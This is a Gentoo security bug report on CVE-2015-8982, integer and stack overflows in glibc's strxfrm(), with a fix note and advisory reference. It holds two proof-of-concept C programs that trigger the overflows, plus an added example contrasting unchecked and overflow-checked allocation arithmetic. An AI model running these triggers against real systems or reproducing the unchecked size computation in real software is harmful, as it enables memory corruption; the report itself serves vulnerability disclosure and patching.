Bug 540070 (CVE-2015-8982)

Summary: <sys-libs/glibc-2.20-r2: multiple overflows in strxfrm()
Product: Gentoo Security
Reporter: Agostino Sarubbo <ago>
Component: Vulnerabilities
Assignee: Gentoo Security <security>
Status: RESOLVED FIXED
Severity: major
CC: mike, toolchain
Priority: Normal
Version: unspecified
Hardware: All
OS: Linux
URL: https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=0f9e585480edcdf1e30dc3d79e24b84aeee516fa
See Also: https://sourceware.org/bugzilla/show_bug.cgi?id=16009
Whiteboard: A2 [glsa]
Package list:
Runtime testing required: ---
Bug Depends on: 516884, 544034
Bug Blocks:

Description Agostino Sarubbo gentoo-dev 2015-02-14 16:03:30 UTC
From ${URL} :

1. Joseph Myers discovered strxfrm is vulnerable to integer overflows
when computing memory allocation sizes (similar to CVE-2012-4412). i.e.
in string/strxfrm_l.c:

  idxarr = (int32_t *) malloc ((srclen + 1) * (sizeof (int32_t) + 1));

Attached strxfrm-int32.c should trigger on 32-bit machines.

2. Shaun Colley discovered strxfrm falls back to an unbounded alloca if
malloc fails, making it vulnerable to stack-based buffer overflows
(similar to CVE-2012-4424) [1]. Attached strxfrm-alloca.c should
trigger.


Both issues were fixed in glibc 2.21 [2] and a quick check shows
vulnerable code appears to go back to at least glibc 2.3.

Please allocate CVEs for these issues. Many thanks.

--mancha

==============

[1] https://sourceware.org/bugzilla/show_bug.cgi?id=16009
[2] https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=0f9e585480ed

/* gcc -o strxfrm-alloca strxfrm-alloca.c */

#include <string.h>
#include <stdlib.h>
#include <locale.h>

#define BUFLEN 512000

int main(void)
{
  char *src = malloc(BUFLEN + 1);
  char *dst = malloc(BUFLEN + 1);
  char *avail = NULL;

  if (!src || !dst)
    return 1;

  /* BUFLEN-byte source string, NUL-terminated */
  memset(src, 'A', BUFLEN);
  src[BUFLEN] = '\0';
  setlocale(LC_ALL, "en_US.UTF-8");

  /* exhaust the heap so the malloc() inside strxfrm() fails and it
     falls back to alloca() for the index array (the leak is intended) */
  do
    avail = malloc(BUFLEN);
  while (avail);

  size_t len = strxfrm(dst, src, BUFLEN);
  (void) len;
  return 0;
}

/* gcc -o strxfrm-int32 strxfrm-int32.c */

#include <string.h>
#include <stdlib.h>
#include <locale.h>

/* (BUFLEN + 1) * (sizeof (int32_t) + 1) == 4294967300, which wraps to 4 in a
   32-bit size_t, so the idxarr allocation in strxfrm_l.c comes out tiny */
#define BUFLEN 858993459

int main(void)
{
  char *src = malloc(BUFLEN + 1);
  char *dst = malloc(BUFLEN + 1);

  if (!src || !dst)
    return 1;

  /* BUFLEN-byte source string, NUL-terminated */
  memset(src, 'A', BUFLEN);
  src[BUFLEN] = '\0';
  setlocale(LC_ALL, "en_US.UTF-8");

  size_t len = strxfrm(dst, src, BUFLEN);
  (void) len;
  return 0;
}
@maintainer(s): after the bump, in case we need to stabilize the package, please let us know if it is ready for the stabilization or not.
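Added example (not from the oss-security post, the attached PoCs, or glibc itself): the allocation-size arithmetic quoted from string/strxfrm_l.c, emulated with a 32-bit size_t so the wraparound is visible on any host, beside an overflow-checked version of the same computation. The function names and the `limit` parameter (standing in for the target platform's SIZE_MAX) are this example's own. It shows why strxfrm-int32.c picks BUFLEN = 858993459 and what a size check has to reject before the value ever reaches malloc().

```c
#include <stdint.h>
#include <inttypes.h>
#include <stdio.h>

/* Element size used by the quoted strxfrm_l.c line: one int32_t plus one byte. */
#define IDX_ELEM_BYTES ((uint64_t) (sizeof (int32_t) + 1))

/* Unchecked arithmetic as in the quoted malloc() call, emulated with a 32-bit
   size_t. Example code, not glibc's own function. */
static uint32_t idxarr_bytes_unchecked32(uint32_t srclen)
{
  return (srclen + 1u) * (uint32_t) IDX_ELEM_BYTES;
}

/* Checked variant. 'limit' is a hypothetical parameter standing in for the
   platform's SIZE_MAX so both the 32-bit and 64-bit cases can be exercised.
   Returns the byte count, or 0 when either the addition or the multiplication
   would exceed 'limit'; 0 is never a valid result because the minimum is
   IDX_ELEM_BYTES. */
static uint64_t idxarr_bytes_checked(uint64_t srclen, uint64_t limit)
{
  if (srclen >= limit)                /* srclen + 1 would wrap */
    return 0;
  uint64_t n = srclen + 1;
  if (n > limit / IDX_ELEM_BYTES)     /* n * IDX_ELEM_BYTES would wrap */
    return 0;
  return n * IDX_ELEM_BYTES;
}

int main(void)
{
  uint32_t poc = 858993459u;          /* BUFLEN from strxfrm-int32.c */

  printf("unchecked, 32-bit size_t: srclen=%" PRIu32 " -> %" PRIu32 " bytes\n",
         poc, idxarr_bytes_unchecked32(poc));
  printf("checked,   32-bit size_t: srclen=%" PRIu32 " -> %" PRIu64 " (0 = rejected)\n",
         poc, idxarr_bytes_checked(poc, UINT32_MAX));
  printf("checked,   64-bit size_t: srclen=%" PRIu32 " -> %" PRIu64 " bytes\n",
         poc, idxarr_bytes_checked(poc, UINT64_MAX));
  return 0;
}
```

With the PoC length, the unchecked 32-bit computation yields 4 bytes for an index array that needs 4294967300, which is the undersized allocation the report describes; the checked version rejects that length on a 32-bit target and accepts it on a 64-bit one. The glibc 2.21 commit in the URL field is where to compare this against glibc's actual handling.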
Comment 1 SpanKY gentoo-dev 2015-02-17 08:09:11 UTC
fix is also in glibc-2.20-r2 now
Comment 2 GLSAMaker/CVETool Bot gentoo-dev 2016-02-17 15:38:36 UTC
This issue was resolved and addressed in
 GLSA 201602-02 at https://security.gentoo.org/glsa/201602-02
by GLSA coordinator Tobias Heinlein (keytoaster).